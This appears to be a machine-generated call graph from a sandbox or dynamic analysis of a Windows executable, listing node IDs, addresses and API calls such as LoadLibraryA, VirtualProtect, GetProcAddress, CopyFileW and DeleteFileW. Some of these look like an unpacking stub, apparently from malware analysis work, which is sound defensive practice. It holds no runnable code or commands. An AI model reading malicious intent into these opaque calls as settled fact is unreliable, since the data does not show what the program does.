99180 c7c707 99166->99180 99168 c7b5ac 99170 c7a4e8 99168->99170 99192 cda0b5 89 API calls 4 library calls 99168->99192 99172 c8fb90 99171->99172 99173 c8fba2 99171->99173 99193 c79e9c 60 API calls Mailbox 99172->99193 99174 c8fba8 99173->99174 99175 c8fbd1 99173->99175 99177 c90ff6 Mailbox 59 API calls 99174->99177 99194 c79e9c 60 API calls Mailbox 99175->99194 99179 c8fb9a 99177->99179 99179->99166 99182 c7c72c _wcscmp 99180->99182 99195 c77b76 99180->99195 99183 c7c760 Mailbox 99182->99183 99200 c77f41 99182->99200 99183->99168 99189 cb1ad7 99191 cb1adb Mailbox 99189->99191 99214 c79e9c 60 API calls Mailbox 99189->99214 99191->99168 99192->99170 99193->99179 99194->99179 99196 c90ff6 Mailbox 59 API calls 99195->99196 99197 c77b9b 99196->99197 99198 c78189 59 API calls 99197->99198 99199 c77baa 99198->99199 99199->99182 99201 c77f50 __NMSG_WRITE _memmove 99200->99201 99202 c90ff6 Mailbox 59 API calls 99201->99202 99203 c77f8e 99202->99203 99204 c77c8e 99203->99204 99205 c77ca0 99204->99205 99206 caf094 99204->99206 99215 c77bb1 99205->99215 99221 cc8123 59 API calls _memmove 99206->99221 99209 c77cac 99213 c7859a 68 API calls 99209->99213 99210 caf09e 99222 c781a7 99210->99222 99212 caf0a6 Mailbox 99213->99189 99214->99191 99216 c77be5 _memmove 99215->99216 99217 c77bbf 99215->99217 99216->99209 99217->99216 99218 c90ff6 Mailbox 59 API calls 99217->99218 99219 c77c34 99218->99219 99220 c90ff6 Mailbox 59 API calls 99219->99220 99220->99216 99221->99210 99223 c781b2 99222->99223 99224 c781ba 99222->99224 99226 c780d7 59 API calls 2 library calls 99223->99226 99224->99212 99226->99224 99227 dbc0b0 99228 dbc0c0 99227->99228 99229 dbc1da LoadLibraryA 99228->99229 99232 dbc21f VirtualProtect VirtualProtect 99228->99232 99230 dbc1f1 99229->99230 99230->99228 99234 dbc203 GetProcAddress 99230->99234 99233 dbc284 99232->99233 99233->99233 99234->99230 99235 dbc219 ExitProcess 99234->99235 99236 c7e70b 99239 c7d260 99236->99239 99238 c7e719 99240 c7d27d 99239->99240 99268 c7d4dd 99239->99268 99241 cb2abb 99240->99241 99242 cb2b0a 99240->99242 99271 c7d2a4 99240->99271 99245 cb2abe 99241->99245 99253 cb2ad9 99241->99253 99310 cea6fb 330 API calls __cinit 99242->99310 99246 cb2aca 99245->99246 99245->99271 99308 cead0f 330 API calls 99246->99308 99247 c92f80 __cinit 67 API calls 99247->99271 99250 c7d594 99302 c78bb2 68 API calls 99250->99302 99251 cb2cdf 99251->99251 99252 c7d6ab 99252->99238 99253->99268 99309 ceb1b7 330 API calls 3 library calls 99253->99309 99257 c7d5a3 99257->99238 99258 cb2c26 99314 ceaa66 89 API calls 99258->99314 99268->99252 99315 cda0b5 89 API calls 4 library calls 99268->99315 99270 c781a7 59 API calls 99270->99271 99271->99247 99271->99250 99271->99252 99271->99258 99271->99268 99271->99270 99273 c7a000 99271->99273 99296 c788a0 68 API calls __cinit 99271->99296 99297 c786a2 68 API calls 99271->99297 99298 c78620 99271->99298 99303 c7859a 68 API calls 99271->99303 99304 c7d0dc 330 API calls 99271->99304 99305 c79f3a 59 API calls Mailbox 99271->99305 99306 c7d060 89 API calls 99271->99306 99307 c7cedd 330 API calls 99271->99307 99311 c78bb2 68 API calls 99271->99311 99312 c79e9c 60 API calls Mailbox 99271->99312 99313 cc6d03 60 API calls 99271->99313 99274 c7a01f 99273->99274 99290 c7a04d Mailbox 99273->99290 99275 c90ff6 Mailbox 59 API calls 99274->99275 99275->99290 99276 c7b5d5 99277 c781a7 59 API calls 99276->99277 99291 c7a1b7 99277->99291 99278 cc7405 59 API calls 99278->99290 99281 c92f80 67 API calls __cinit 99281->99290 99282 c90ff6 59 API calls Mailbox 99282->99290 99283 c781a7 59 API calls 99283->99290 99285 cb047f 99376 cda0b5 89 API calls 4 library calls 99285->99376 99287 c777c7 59 API calls 99287->99290 99289 cb048e 99289->99271 99290->99276 99290->99278 99290->99281 99290->99282 99290->99283 99290->99285 99290->99287 99290->99291 99292 cb0e00 99290->99292 99294 c7b5da 99290->99294 99295 c7a6ba 99290->99295 99316 c7ca20 99290->99316 99375 c7ba60 60 API calls Mailbox 99290->99375 99291->99271 99378 cda0b5 89 API calls 4 library calls 99292->99378 99379 cda0b5 89 API calls 4 library calls 99294->99379 99377 cda0b5 89 API calls 4 library calls 99295->99377 99296->99271 99297->99271 99299 c7862b 99298->99299 99300 c78652 99299->99300 100770 c78b13 69 API calls Mailbox 99299->100770 99300->99271 99302->99257 99303->99271 99304->99271 99305->99271 99306->99271 99307->99271 99308->99252 99309->99268 99310->99271 99311->99271 99312->99271 99313->99271 99314->99268 99315->99251 99317 c7ca49 99316->99317 99333 c7cac2 99316->99333 99318 cb25ed 99317->99318 99321 c7ca60 99317->99321 99327 cb2617 99317->99327 99380 cec9f3 99318->99380 99320 cb25e1 99425 cda0b5 89 API calls 4 library calls 99320->99425 99325 cb2745 99321->99325 99339 c7ca71 99321->99339 99356 c7ca88 Mailbox 99321->99356 99323 c7a000 330 API calls 99323->99333 99330 c781a7 59 API calls 99325->99330 99326 cb24ef 99419 c79df0 99326->99419 99329 cb264b 99327->99329 99334 cb262f 99327->99334 99329->99318 99427 cea528 59 API calls Mailbox 99329->99427 99330->99356 99331 c7cc3a 99331->99290 99333->99323 99333->99326 99333->99331 99351 c7cbe5 99333->99351 99358 c7cb82 99333->99358 99373 cb24f7 99333->99373 99426 cda0b5 89 API calls 4 library calls 99334->99426 99335 cb2819 99342 cb284f 99335->99342 99551 cec5f4 96 API calls Mailbox 99335->99551 99337 cb2541 99341 c781a7 59 API calls 99337->99341 99338 cb2661 99343 cb26c5 99338->99343 99355 cb2679 99338->99355 99339->99356 99530 cc7405 59 API calls 99339->99530 99341->99356 99553 c79e9c 60 API calls Mailbox 99342->99553 99447 cd7ba4 59 API calls 99343->99447 99345 cb27f7 99532 c79997 99345->99532 99350 cb282d 99354 c79997 84 API calls 99350->99354 99362 c7cbf2 Mailbox 99351->99362 99418 cda0b5 89 API calls 4 library calls 99351->99418 99352 c7cab7 99352->99290 99368 cb2835 __NMSG_WRITE 99354->99368 99428 cd7581 59 API calls Mailbox 99355->99428 99356->99335 99356->99352 99531 cec4a7 85 API calls 2 library calls 99356->99531 99357 cb26d7 99448 c75ea1 59 API calls Mailbox 99357->99448 99358->99351 99416 c78ea0 59 API calls Mailbox 99358->99416 99362->99337 99362->99356 99417 cc7405 59 API calls 99362->99417 99363 cb26e0 Mailbox 99449 cd7581 59 API calls Mailbox 99363->99449 99364 cb27ff __NMSG_WRITE 99364->99335 99550 c79e9c 60 API calls Mailbox 99364->99550 99365 cb269b 99429 c7f5c0 99365->99429 99368->99342 99552 c79e9c 60 API calls Mailbox 99368->99552 99372 cb26f9 99450 c7fe40 99372->99450 99373->99320 99373->99356 99373->99362 99424 cec8d7 330 API calls 99373->99424 99375->99290 99376->99289 99377->99291 99378->99294 99379->99291 99381 c777c7 59 API calls 99380->99381 99382 ceca18 99381->99382 99383 c77f41 59 API calls 99382->99383 99394 ceca51 99382->99394 99384 ceca3a 99383->99384 99392 c92f80 __cinit 67 API calls 99384->99392 99385 cecab9 99388 cecad0 99385->99388 99391 cecaf3 99385->99391 99386 ceca85 99562 ce96db 330 API calls Mailbox 99386->99562 99390 cecad5 99388->99390 99393 c77d2c 59 API calls 99388->99393 99389 ceca99 99396 ceca9d 99389->99396 99413 cecaaa 99389->99413 99566 c79e9c 60 API calls Mailbox 99390->99566 99395 c781a7 59 API calls 99391->99395 99392->99394 99399 cecaf1 99393->99399 99394->99385 99394->99386 99395->99399 99565 cda0b5 89 API calls 4 library calls 99396->99565 99399->99396 99407 cecb48 99399->99407 99563 cea2d2 330 API calls 99399->99563 99403 cecb39 99406 cecb3d 99403->99406 99403->99407 99404 cecb46 Mailbox 99571 cc66f4 59 API calls Mailbox 99404->99571 99405 cecb7d 99405->99396 99408 cecb98 99405->99408 99564 cd9ea3 89 API calls 4 library calls 99406->99564 99407->99396 99554 cea1f2 99407->99554 99408->99390 99411 cecbc2 99408->99411 99411->99413 99414 cecc0b 99411->99414 99412 cecc36 99412->99356 99413->99404 99567 cd77cf 99413->99567 99415 cec9f3 330 API calls 99414->99415 99415->99404 99416->99351 99417->99362 99418->99326 99421 c79dfb 99419->99421 99420 c79e32 99420->99373 99421->99420 99644 c78e34 59 API calls Mailbox 99421->99644 99423 c79e5d 99423->99373 99424->99373 99425->99318 99426->99352 99427->99338 99428->99365 99430 c7f7b0 99429->99430 99431 c7f61a 99429->99431 99432 c77f41 59 API calls 99430->99432 99433 c7f626 99431->99433 99434 cb4848 99431->99434 99441 c7f6ec Mailbox 99432->99441 99645 c7f3f0 99433->99645 99752 cebf80 330 API calls Mailbox 99434->99752 99437 c7f65d 99438 c7f790 99437->99438 99439 cb4856 99437->99439 99437->99441 99438->99373 99439->99438 99753 cda0b5 89 API calls 4 library calls 99439->99753 99660 cdcde5 99441->99660 99740 ce474d 99441->99740 99749 cd3e73 99441->99749 99442 c79df0 Mailbox 59 API calls 99443 c7f743 99442->99443 99443->99438 99443->99442 99447->99357 99448->99363 99449->99372 100582 c782e0 99450->100582 99452 c7fe9d 99453 cb4b57 99452->99453 99512 c80856 99452->99512 100587 c7f394 99452->100587 100680 cda0b5 89 API calls 4 library calls 99453->100680 99457 c7ff33 99458 c806a5 _memmove 99457->99458 99459 c7ff9e 99457->99459 99460 c80677 99457->99460 99465 cb4b6c 99457->99465 99474 cb4b7f 99457->99474 99484 c90ff6 59 API calls Mailbox 99457->99484 99493 c7a000 330 API calls 99457->99493 99503 cb4c36 99457->99503 99485 c90ff6 Mailbox 59 API calls 99458->99485 99461 cb4cb7 99459->99461 99466 c7ffac 99459->99466 100684 cc6c62 59 API calls 2 library calls 99459->100684 99470 c90ff6 Mailbox 59 API calls 99460->99470 99461->99465 99461->99466 100686 cea5ee 85 API calls Mailbox 99461->100686 99463 cb4c01 99463->99465 100682 cda0b5 89 API calls 4 library calls 99463->100682 99471 cb4d23 99466->99471 99517 cb4f7d 99466->99517 100591 c784dc 99466->100591 99467 cb4c72 100685 cc6665 59 API calls 2 library calls 99467->100685 99470->99458 99478 cb4d41 99471->99478 100688 c78720 59 API calls Mailbox 99471->100688 99474->99463 100681 c7f803 330 API calls 99474->100681 99476 cb4cdc Mailbox 99476->99466 100687 cc6c62 59 API calls 2 library calls 99476->100687 99482 cb4d52 99478->99482 100689 c78720 59 API calls Mailbox 99478->100689 99479 c80004 99488 c80092 99479->99488 99489 cb4f00 99479->99489 99522 c802d9 Mailbox _memmove 99479->99522 99480 cb4c95 99483 c7a000 330 API calls 99480->99483 99482->99522 100690 cc6621 59 API calls Mailbox 99482->100690 99483->99461 99484->99457 99528 c80266 _memmove 99485->99528 99490 c90ff6 Mailbox 59 API calls 99488->99490 100695 cd9d71 60 API calls 99489->100695 99494 c80099 99490->99494 99493->99457 99494->99512 100598 c80b30 99494->100598 99495 cb4e77 99496 c7a000 330 API calls 99495->99496 99497 cb4eb1 99496->99497 99497->99465 99501 c78620 69 API calls 99497->99501 99499 c80112 99499->99458 99507 c80146 99499->99507 99499->99512 99506 cb4edc 99501->99506 100683 cda0b5 89 API calls 4 library calls 99503->100683 100694 cda0b5 89 API calls 4 library calls 99506->100694 99511 c781a7 59 API calls 99507->99511 99513 c80167 99507->99513 99509 c79df0 Mailbox 59 API calls 99509->99528 99511->99513 100679 cda0b5 89 API calls 4 library calls 99512->100679 99513->99512 99516 cb4f4e 99513->99516 99520 c801ac 99513->99520 99514 c804f8 99514->99373 99515 c90ff6 59 API calls Mailbox 99515->99522 100696 c79e9c 60 API calls Mailbox 99516->100696 99517->99465 100697 cda0b5 89 API calls 4 library calls 99517->100697 99519 c80238 100675 c79e9c 60 API calls Mailbox 99519->100675 99520->99512 99520->99517 99520->99519 99522->99495 99522->99506 99522->99512 99522->99514 99522->99515 99523 cb4e46 99522->99523 100677 c788a0 68 API calls __cinit 99522->100677 100678 c787c0 68 API calls 99522->100678 100691 cd5bd9 68 API calls 99522->100691 100692 c78b13 69 API calls Mailbox 99522->100692 100693 c79e9c 60 API calls Mailbox 99522->100693 99526 c90ff6 Mailbox 59 API calls 99523->99526 99524 c8024b 99524->99512 100676 c7843f 59 API calls Mailbox 99524->100676 99526->99495 99528->99509 99528->99522 99529 c802c2 99528->99529 99529->99373 99530->99356 99531->99345 99533 c799b1 99532->99533 99534 c799ab 99532->99534 99535 caf9fc __i64tow 99533->99535 99536 c799f9 99533->99536 99537 c799b7 __itow 99533->99537 99541 caf903 99533->99541 99534->99364 100768 c938d8 83 API calls 3 library calls 99536->100768 99540 c90ff6 Mailbox 59 API calls 99537->99540 99542 c799d1 99540->99542 99543 caf97b Mailbox _wcscpy 99541->99543 99544 c90ff6 Mailbox 59 API calls 99541->99544 99542->99534 99545 c77f41 59 API calls 99542->99545 100769 c938d8 83 API calls 3 library calls 99543->100769 99546 caf948 99544->99546 99545->99534 99547 c90ff6 Mailbox 59 API calls 99546->99547 99548 caf96e 99547->99548 99548->99543 99549 c77f41 59 API calls 99548->99549 99549->99543 99550->99335 99551->99350 99552->99342 99553->99352 99555 cea204 99554->99555 99561 cea247 Mailbox 99554->99561 99556 c77f41 59 API calls 99555->99556 99557 cea213 99556->99557 99558 cd77cf 59 API calls 99557->99558 99559 cea22a 99558->99559 99572 ce9d4c 99559->99572 99561->99405 99562->99389 99563->99403 99564->99404 99565->99404 99566->99404 99568 cd77da 99567->99568 99569 c90ff6 Mailbox 59 API calls 99568->99569 99570 cd77e8 99569->99570 99570->99404 99571->99412 99573 ce9d79 99572->99573 99574 ce9d62 99572->99574 99618 ce96db 330 API calls Mailbox 99573->99618 99574->99573 99576 ce9d8b 99574->99576 99577 ce9dad 99576->99577 99578 ce9d96 99576->99578 99580 ce9de4 99577->99580 99581 ce9db3 99577->99581 99587 ce9e38 99578->99587 99582 ce9da8 99580->99582 99585 c793ea 59 API calls 99580->99585 99614 c793ea 99581->99614 99582->99561 99585->99582 99589 ce9e8e 99587->99589 99590 ce9e78 99587->99590 99638 ce96db 330 API calls Mailbox 99589->99638 99590->99589 99619 cc7a1e 99590->99619 99592 ce9ed9 99592->99589 99593 ce9ee8 99592->99593 99595 ce9f11 99593->99595 99623 cc76c5 99593->99623 99599 ce9f8d 99595->99599 99633 cc7096 VariantInit 99595->99633 99600 ce9fc7 99599->99600 99634 cc70dc 107 API calls 99599->99634 99601 ce9fff VariantClear 99600->99601 99603 cea055 VariantInit 99600->99603 99601->99600 99602 cea01e SysAllocString 99601->99602 99602->99600 99604 cea08a _memset 99603->99604 99605 cea107 99604->99605 99606 cea12d 99604->99606 99635 ce96db 330 API calls Mailbox 99605->99635 99636 cd7804 105 API calls Mailbox 99606->99636 99608 cea126 99610 cea1bc VariantClear 99608->99610 99611 cea1cd 99610->99611 99611->99582 99612 cea149 99612->99610 99637 cd7804 105 API calls Mailbox 99612->99637 99615 c90ff6 Mailbox 59 API calls 99614->99615 99616 c793f7 99615->99616 99617 cd69a9 92 API calls 99616->99617 99617->99582 99618->99582 99620 cc7a2f __NMSG_WRITE 99619->99620 99622 cc7a41 99619->99622 99620->99622 99639 c8fec6 99620->99639 99622->99592 99624 cc76ef 99623->99624 99625 cc7815 SysFreeString 99624->99625 99626 cc78a2 99624->99626 99627 cc7700 99624->99627 99632 cc7821 99624->99632 99625->99632 99626->99627 99628 cc78fc SysFreeString 99626->99628 99629 cc78ec lstrcmpiW 99626->99629 99626->99632 99627->99595 99628->99626 99629->99628 99631 cc791c SysFreeString 99629->99631 99631->99632 99632->99627 99643 cc7579 RaiseException 99632->99643 99633->99595 99634->99599 99635->99608 99636->99612 99637->99612 99638->99611 99640 c8fed0 __NMSG_WRITE 99639->99640 99641 c90ff6 Mailbox 59 API calls 99640->99641 99642 c8fee5 _wcscpy 99641->99642 99642->99622 99643->99632 99644->99423 99646 c7f59a 99645->99646 99648 c7f41c 99645->99648 99755 cda0b5 89 API calls 4 library calls 99646->99755 99648->99646 99656 c7f459 _memmove 99648->99656 99649 c7f533 99650 c7f543 99649->99650 99754 cea5ee 85 API calls Mailbox 99649->99754 99650->99437 99652 c90ff6 59 API calls Mailbox 99652->99656 99653 cb4823 99757 c7f803 330 API calls 99653->99757 99654 c7a000 330 API calls 99654->99656 99656->99649 99656->99652 99656->99653 99656->99654 99657 cb47d3 99656->99657 99658 cb47d5 99656->99658 99657->99437 99658->99657 99756 cda0b5 89 API calls 4 library calls 99658->99756 99661 c777c7 59 API calls 99660->99661 99662 cdce1a 99661->99662 99663 c777c7 59 API calls 99662->99663 99664 cdce23 99663->99664 99665 cdce37 99664->99665 99945 c79c9c 59 API calls 99664->99945 99667 c79997 84 API calls 99665->99667 99668 cdce54 99667->99668 99669 cdcf55 99668->99669 99670 cdce76 99668->99670 99673 cdcf85 Mailbox 99668->99673 99758 c74f3d 99669->99758 99671 c79997 84 API calls 99670->99671 99674 cdce82 99671->99674 99673->99443 99676 c781a7 59 API calls 99674->99676 99679 cdce8e 99676->99679 99677 cdcf81 99677->99673 99678 c777c7 59 API calls 99677->99678 99681 cdcfb6 99678->99681 99684 cdced4 99679->99684 99685 cdcea2 99679->99685 99680 c74f3d 135 API calls 99680->99677 99682 c777c7 59 API calls 99681->99682 99683 cdcfbf 99682->99683 99687 c777c7 59 API calls 99683->99687 99686 c79997 84 API calls 99684->99686 99688 c781a7 59 API calls 99685->99688 99690 cdcee1 99686->99690 99691 cdcfc8 99687->99691 99689 cdceb2 99688->99689 99946 c77e0b 99689->99946 99693 c781a7 59 API calls 99690->99693 99694 c777c7 59 API calls 99691->99694 99696 cdceed 99693->99696 99697 cdcfd1 99694->99697 99953 cd4cd3 GetFileAttributesW 99696->99953 99700 c79997 84 API calls 99697->99700 99698 c79997 84 API calls 99701 cdcec8 99698->99701 99703 cdcfde 99700->99703 99704 c77c8e 59 API calls 99701->99704 99702 cdcef6 99705 cdcf09 99702->99705 99709 c77b52 59 API calls 99702->99709 99782 c746f9 99703->99782 99704->99684 99708 c79997 84 API calls 99705->99708 99715 cdcf0f 99705->99715 99707 cdcff9 99833 c77b52 99707->99833 99711 cdcf36 99708->99711 99709->99705 99954 cd3a2b 75 API calls Mailbox 99711->99954 99714 cdd03c 99717 c781a7 59 API calls 99714->99717 99715->99673 99716 c77b52 59 API calls 99718 cdd019 99716->99718 99719 cdd04a 99717->99719 99718->99714 99721 c77d2c 59 API calls 99718->99721 99720 c77c8e 59 API calls 99719->99720 99722 cdd058 99720->99722 99723 cdd02e 99721->99723 99724 c77c8e 59 API calls 99722->99724 99726 c77d2c 59 API calls 99723->99726 99725 cdd066 99724->99725 99727 c77c8e 59 API calls 99725->99727 99726->99714 99728 cdd074 99727->99728 99729 c79997 84 API calls 99728->99729 99730 cdd080 99729->99730 99836 cd42ad 99730->99836 99732 cdd091 99733 cd3e73 3 API calls 99732->99733 99734 cdd09b 99733->99734 99735 c79997 84 API calls 99734->99735 99738 cdd0cc 99734->99738 99736 cdd0b9 99735->99736 99890 cd93df 99736->99890 99955 c74faa 99738->99955 99741 c79997 84 API calls 99740->99741 99742 ce4787 99741->99742 100544 c763a0 99742->100544 99744 ce4797 99745 ce47bc 99744->99745 99746 c7a000 330 API calls 99744->99746 99748 ce47c0 99745->99748 100569 c79bf8 59 API calls Mailbox 99745->100569 99746->99745 99748->99443 100578 cd4696 GetFileAttributesW 99749->100578 99752->99439 99753->99438 99754->99650 99755->99657 99756->99657 99757->99657 99961 c74d13 99758->99961 99763 cadd0f 99766 c74faa 84 API calls 99763->99766 99764 c74f68 LoadLibraryExW 99971 c74cc8 99764->99971 99768 cadd16 99766->99768 99770 c74cc8 3 API calls 99768->99770 99772 cadd1e 99770->99772 99771 c74f8f 99771->99772 99773 c74f9b 99771->99773 99997 c7506b 99772->99997 99775 c74faa 84 API calls 99773->99775 99777 c74fa0 99775->99777 99777->99677 99777->99680 99779 cadd45 100003 c75027 99779->100003 99783 c777c7 59 API calls 99782->99783 99784 c7470f 99783->99784 99785 c777c7 59 API calls 99784->99785 99786 c74717 99785->99786 99787 c777c7 59 API calls 99786->99787 99788 c7471f 99787->99788 99789 c777c7 59 API calls 99788->99789 99790 c74727 99789->99790 99791 cad8fb 99790->99791 99792 c7475b 99790->99792 99793 c781a7 59 API calls 99791->99793 99794 c779ab 59 API calls 99792->99794 99795 cad904 99793->99795 99796 c74769 99794->99796 100188 c77eec 99795->100188 99798 c77e8c 59 API calls 99796->99798 99799 c74773 99798->99799 99800 c7479e 99799->99800 99801 c779ab 59 API calls 99799->99801 99802 c747de 99800->99802 99804 c747bd 99800->99804 99815 cad924 99800->99815 99805 c74794 99801->99805 100175 c779ab 99802->100175 99809 c77b52 59 API calls 99804->99809 99808 c77e8c 59 API calls 99805->99808 99806 c747ef 99811 c74801 99806->99811 99813 c781a7 59 API calls 99806->99813 99807 cad9f4 99812 c77d2c 59 API calls 99807->99812 99808->99800 99810 c747c7 99809->99810 99810->99802 99816 c779ab 59 API calls 99810->99816 99814 c74811 99811->99814 99817 c781a7 59 API calls 99811->99817 99828 cad9b1 99812->99828 99813->99811 99819 c74818 99814->99819 99820 c781a7 59 API calls 99814->99820 99815->99807 99818 cad9dd 99815->99818 99827 cad95b 99815->99827 99816->99802 99817->99814 99818->99807 99824 cad9c8 99818->99824 99821 c781a7 59 API calls 99819->99821 99830 c7481f Mailbox 99819->99830 99820->99819 99821->99830 99822 c77b52 59 API calls 99822->99828 99823 cad9b9 99825 c77d2c 59 API calls 99823->99825 99826 c77d2c 59 API calls 99824->99826 99825->99828 99826->99828 99827->99823 99831 cad9a4 99827->99831 99828->99802 99828->99822 100192 c77a84 59 API calls 2 library calls 99828->100192 99830->99707 99832 c77d2c 59 API calls 99831->99832 99832->99828 99834 c77faf 59 API calls 99833->99834 99835 c77b5d 99834->99835 99835->99714 99835->99716 99837 cd42c9 99836->99837 99838 cd42dc 99837->99838 99839 cd42ce 99837->99839 99841 c777c7 59 API calls 99838->99841 99840 c781a7 59 API calls 99839->99840 99889 cd42d7 Mailbox 99840->99889 99842 cd42e4 99841->99842 99843 c777c7 59 API calls 99842->99843 99844 cd42ec 99843->99844 99845 c777c7 59 API calls 99844->99845 99846 cd42f7 99845->99846 99847 c777c7 59 API calls 99846->99847 99848 cd42ff 99847->99848 99849 c777c7 59 API calls 99848->99849 99850 cd4307 99849->99850 99851 c777c7 59 API calls 99850->99851 99852 cd430f 99851->99852 99853 c777c7 59 API calls 99852->99853 99854 cd4317 99853->99854 99855 c777c7 59 API calls 99854->99855 99856 cd431f 99855->99856 99857 c746f9 59 API calls 99856->99857 99858 cd4336 99857->99858 99859 c746f9 59 API calls 99858->99859 99860 cd434f 99859->99860 99861 c77b52 59 API calls 99860->99861 99862 cd435b 99861->99862 99863 cd436e 99862->99863 99864 c77e8c 59 API calls 99862->99864 99865 c77b52 59 API calls 99863->99865 99864->99863 99866 cd4377 99865->99866 99867 cd4387 99866->99867 99868 c77e8c 59 API calls 99866->99868 99869 c781a7 59 API calls 99867->99869 99868->99867 99870 cd4393 99869->99870 99871 c77c8e 59 API calls 99870->99871 99872 cd439f 99871->99872 100194 cd445f 59 API calls 99872->100194 99874 cd43ae 100195 cd445f 59 API calls 99874->100195 99876 cd43c1 99877 c77b52 59 API calls 99876->99877 99878 cd43cb 99877->99878 99879 cd43d0 99878->99879 99880 cd43e2 99878->99880 99882 c77e0b 59 API calls 99879->99882 99881 c77b52 59 API calls 99880->99881 99883 cd43eb 99881->99883 99884 cd43dd 99882->99884 99885 cd4409 99883->99885 99886 c77e0b 59 API calls 99883->99886 99887 c77c8e 59 API calls 99884->99887 99888 c77c8e 59 API calls 99885->99888 99886->99884 99887->99885 99888->99889 99889->99732 99891 cd93ec __ftell_nolock 99890->99891 99892 c90ff6 Mailbox 59 API calls 99891->99892 99893 cd9449 99892->99893 99894 c7538e 59 API calls 99893->99894 99895 cd9453 99894->99895 100196 cd91e9 99895->100196 99897 cd945e 99898 c75045 85 API calls 99897->99898 99899 cd9471 _wcscmp 99898->99899 99900 cd9495 99899->99900 99901 cd9542 99899->99901 100229 cd99be 96 API calls 2 library calls 99900->100229 100232 cd99be 96 API calls 2 library calls 99901->100232 99904 cd949a 99908 cd954b 99904->99908 100230 c9432e 58 API calls __wsplitpath_helper 99904->100230 99905 cd950e _wcscat 99907 c7506b 74 API calls 99905->99907 99905->99908 99909 cd9567 99907->99909 99908->99738 99910 c7506b 74 API calls 99909->99910 99911 cd9577 99910->99911 99913 c7506b 74 API calls 99911->99913 99912 cd94c3 _wcscat _wcscpy 100231 c9432e 58 API calls __wsplitpath_helper 99912->100231 99915 cd9592 99913->99915 99916 c7506b 74 API calls 99915->99916 99917 cd95a2 99916->99917 99918 c7506b 74 API calls 99917->99918 99919 cd95bd 99918->99919 99920 c7506b 74 API calls 99919->99920 99921 cd95cd 99920->99921 99922 c7506b 74 API calls 99921->99922 99923 cd95dd 99922->99923 99924 c7506b 74 API calls 99923->99924 99925 cd95ed 99924->99925 100199 cd9b6d GetTempPathW GetTempFileNameW 99925->100199 99927 cd95f9 99928 c9548b 115 API calls 99927->99928 99939 cd960a 99928->99939 99929 cd96c4 100213 c955d6 99929->100213 99931 cd96cf 99933 cd96e9 99931->99933 99934 cd96d5 DeleteFileW 99931->99934 99932 c7506b 74 API calls 99932->99939 99935 cd978f CopyFileW 99933->99935 99940 cd96f3 _wcsncpy 99933->99940 99934->99908 99939->99908 99939->99929 99939->99932 100200 c94a93 99939->100200 99945->99665 99947 c77e1f 99946->99947 99948 caf173 99946->99948 100539 c77db0 99947->100539 99950 c78189 59 API calls 99948->99950 99952 caf17e __NMSG_WRITE _memmove 99950->99952 99951 c77e2a 99951->99698 99953->99702 99954->99715 99956 c74fb4 99955->99956 99957 c74fbb 99955->99957 99958 c955d6 __fcloseall 83 API calls 99956->99958 99959 c74fdb FreeLibrary 99957->99959 99960 c74fca 99957->99960 99958->99957 99959->99960 99960->99673 100008 c74d61 99961->100008 99964 c74d61 2 API calls 99967 c74d3a 99964->99967 99965 c74d53 99968 c9548b 99965->99968 99966 c74d4a FreeLibrary 99966->99965 99967->99965 99967->99966 100012 c954a0 99968->100012 99970 c74f5c 99970->99763 99970->99764 100081 c74d94 99971->100081 99974 c74d94 2 API calls 99977 c74ced 99974->99977 99975 c74cff FreeLibrary 99976 c74d08 99975->99976 99978 c74dd0 99976->99978 99977->99975 99977->99976 99979 c90ff6 Mailbox 59 API calls 99978->99979 99980 c74de5 99979->99980 100085 c7538e 99980->100085 99982 c74df1 _memmove 99983 c74f21 99982->99983 99984 c74ee9 99982->99984 99988 c74e2c 99982->99988 100100 cd9ba5 95 API calls 99983->100100 100088 c74fe9 99984->100088 99985 c75027 69 API calls 99994 c74e35 99985->99994 99988->99985 99989 c7506b 74 API calls 99989->99994 99991 c74ec9 99991->99771 99992 cadcd0 99993 c75045 85 API calls 99992->99993 99995 cadce4 99993->99995 99994->99989 99994->99991 99994->99992 100095 c75045 99994->100095 99996 c7506b 74 API calls 99995->99996 99996->99991 99998 c7507d 99997->99998 99999 caddf6 99997->99999 100124 c95812 99998->100124 100002 cd9393 GetSystemTimeAsFileTime 100002->99779 100004 c75036 100003->100004 100005 caddb9 100003->100005 100157 c95e90 100004->100157 100007 c7503e 100009 c74d2e 100008->100009 100010 c74d6a LoadLibraryA 100008->100010 100009->99964 100009->99967 100010->100009 100011 c74d7b GetProcAddress 100010->100011 100011->100009 100015 c954ac _raise 100012->100015 100013 c954bf 100061 c98d68 58 API calls __getptd_noexit 100013->100061 100015->100013 100017 c954f0 100015->100017 100016 c954c4 100062 c98ff6 9 API calls _raise 100016->100062 100031 ca0738 100017->100031 100020 c954f5 100021 c9550b 100020->100021 100022 c954fe 100020->100022 100023 c95535 100021->100023 100024 c95515 100021->100024 100063 c98d68 58 API calls __getptd_noexit 100022->100063 100046 ca0857 100023->100046 100064 c98d68 58 API calls __getptd_noexit 100024->100064 100030 c954cf _raise @_EH4_CallFilterFunc@8 100030->99970 100032 ca0744 _raise 100031->100032 100033 c99e4b __lock 58 API calls 100032->100033 100044 ca0752 100033->100044 100034 ca07c6 100066 ca084e 100034->100066 100035 ca07cd 100071 c98a5d 58 API calls 2 library calls 100035->100071 100038 ca0843 _raise 100038->100020 100039 ca07d4 100039->100034 100072 c9a06b InitializeCriticalSectionAndSpinCount 100039->100072 100041 c99ed3 __mtinitlocknum 58 API calls 100041->100044 100043 ca07fa RtlEnterCriticalSection 100043->100034 100044->100034 100044->100035 100044->100041 100069 c96e8d 59 API calls __lock 100044->100069 100070 c96ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 100044->100070 100055 ca0877 __wopenfile 100046->100055 100047 ca0891 100076 c98d68 58 API calls __getptd_noexit 100047->100076 100048 ca0a4c 100048->100047 100052 ca0aaf 100048->100052 100050 ca0896 100077 c98ff6 9 API calls _raise 100050->100077 100073 ca87f1 100052->100073 100053 c95540 100065 c95562 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100053->100065 100055->100047 100055->100048 100078 c93a0b 60 API calls 2 library calls 100055->100078 100057 ca0a45 100057->100048 100079 c93a0b 60 API calls 2 library calls 100057->100079 100059 ca0a64 100059->100048 100080 c93a0b 60 API calls 2 library calls 100059->100080 100061->100016 100062->100030 100063->100030 100064->100030 100065->100030 100067 c99fb5 _doexit RtlLeaveCriticalSection 100066->100067 100068 ca0855 100067->100068 100068->100038 100069->100044 100070->100044 100071->100039 100072->100043 100074 ca7fd5 __wsopen_helper 109 API calls 100073->100074 100075 ca880a 100074->100075 100075->100053 100076->100050 100077->100053 100078->100057 